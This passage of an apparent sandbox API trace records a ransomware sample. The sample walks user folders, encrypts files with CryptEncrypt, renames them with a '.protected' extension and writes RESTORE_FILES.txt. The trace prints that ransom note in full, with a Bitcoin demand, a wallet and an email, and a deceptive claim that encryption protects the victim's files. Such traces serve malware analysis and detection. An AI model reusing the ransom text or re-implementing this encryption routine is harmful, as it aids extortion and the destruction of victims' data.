lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.069] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="Windows") returned -1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="Program Files") returned -1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="Program Files (x86)") returned -1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="$Recycle.bin") returned 1 [0095.069] lstrcmpiW (lpString1="Contacts", lpString2="System Volume Information") returned -1 [0095.069] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts") returned 29 [0095.069] lstrcmpW 
(lpString1="Contacts", lpString2=".") returned 1 [0095.069] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0095.069] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\*") returned 31 [0095.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.070] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.070] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.070] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.070] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.070] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.070] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\.") returned 31 [0095.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.070] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.070] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\." 
(normalized: "c:\\users\\default\\contacts\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.070] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.070] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.070] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.070] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.070] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\..") returned 32 [0095.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.070] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.071] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.071] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.071] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\.." 
(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.071] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="Windows") returned -1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="Program Files") returned -1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="Program Files (x86)") returned -1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="$Recycle.bin") returned 1 [0095.071] lstrcmpiW (lpString1="Administrator.contact", lpString2="System Volume Information") returned -1 [0095.071] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0095.071] StrStrIW (lpFirst="Administrator.contact", lpSrch=".protected") returned 0x0 [0095.071] lstrcmpW (lpString1="Administrator.contact", lpString2="RESTORE_FILES.txt") returned -1 [0095.071] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.071] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.072] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0095.072] StrStrW (lpFirst="Administrator.contact", lpSrch=".txt") returned 0x0 [0095.072] 
lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0095.072] StrStrW (lpFirst="Administrator.contact", lpSrch=".rar") returned 0x0 [0095.072] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0095.072] StrStrW (lpFirst="Administrator.contact", lpSrch=".zip") returned 0x0 [0095.073] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0095.084] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.084] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0095.084] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.085] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.085] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.085] CloseHandle (hObject=0xb4) returned 1 [0095.085] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.protected") returned 61 [0095.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), 
lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.protected" (normalized: "c:\\users\\default\\contacts\\administrator.contact.protected")) returned 1 [0095.086] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.086] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.086] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0095.086] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.086] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.086] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.086] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.087] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0095.087] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.087] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0095.087] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") 
returned 0x0 [0095.087] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0095.087] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.087] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x19c, lpOverlapped=0x0) returned 1 [0095.088] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.088] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x19c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x19c, lpOverlapped=0x0) returned 1 [0095.088] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.088] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.088] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.089] CloseHandle (hObject=0xb4) returned 1 [0095.089] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.protected") returned 51 [0095.089] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini.protected" (normalized: "c:\\users\\default\\contacts\\desktop.ini.protected")) returned 1 [0095.089] FindNextFileW (in: hFindFile=0x47b990, 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.089] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.089] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\RESTORE_FILES.txt") returned 47 [0095.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\contacts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.111] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.111] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.112] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.112] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.112] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.112] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.112] CloseHandle (hObject=0xa4) returned 1 [0095.112] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="Windows") returned -1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="Program Files") returned -1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="Program Files (x86)") returned -1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="$Recycle.bin") returned 1 [0095.112] lstrcmpiW (lpString1="Cookies", lpString2="System Volume Information") returned -1 [0095.112] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies") returned 28 [0095.112] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0095.112] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0095.112] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies\\*") returned 30 [0095.112] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.113] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.113] lstrcmpiW (lpString1="Desktop", 
lpString2="Windows") returned -1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="Program Files") returned -1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="Program Files (x86)") returned -1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="$Recycle.bin") returned 1 [0095.113] lstrcmpiW (lpString1="Desktop", lpString2="System Volume Information") returned -1 [0095.113] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop") returned 28 [0095.113] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0095.113] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0095.113] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\*") returned 30 [0095.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.113] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.113] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.113] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.113] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.113] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.113] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\.") returned 30 [0095.113] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.113] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.113] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.113] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.113] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295f154*=0x30) returned 1 [0095.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\." (normalized: "c:\\users\\default\\desktop\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.114] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.114] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.114] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.114] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.114] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.114] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.114] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\..") returned 31 [0095.114] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.114] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.114] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.114] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.114] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.114] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\.." 
(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.114] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.114] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.114] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0095.114] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.114] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.114] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.114] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.115] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.115] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0095.115] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.115] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0095.115] StrStrW (lpFirst="desktop.ini", 
lpSrch=".rar") returned 0x0 [0095.115] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0095.115] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.116] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.116] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.116] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.117] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.117] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.117] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.117] CloseHandle (hObject=0xb4) returned 1 [0095.117] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.protected") returned 50 [0095.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini.protected" (normalized: "c:\\users\\default\\desktop\\desktop.ini.protected")) returned 1 [0095.125] FindNextFileW (in: hFindFile=0x47b990, 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.125] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.125] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\RESTORE_FILES.txt") returned 46 [0095.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\desktop\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.125] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: 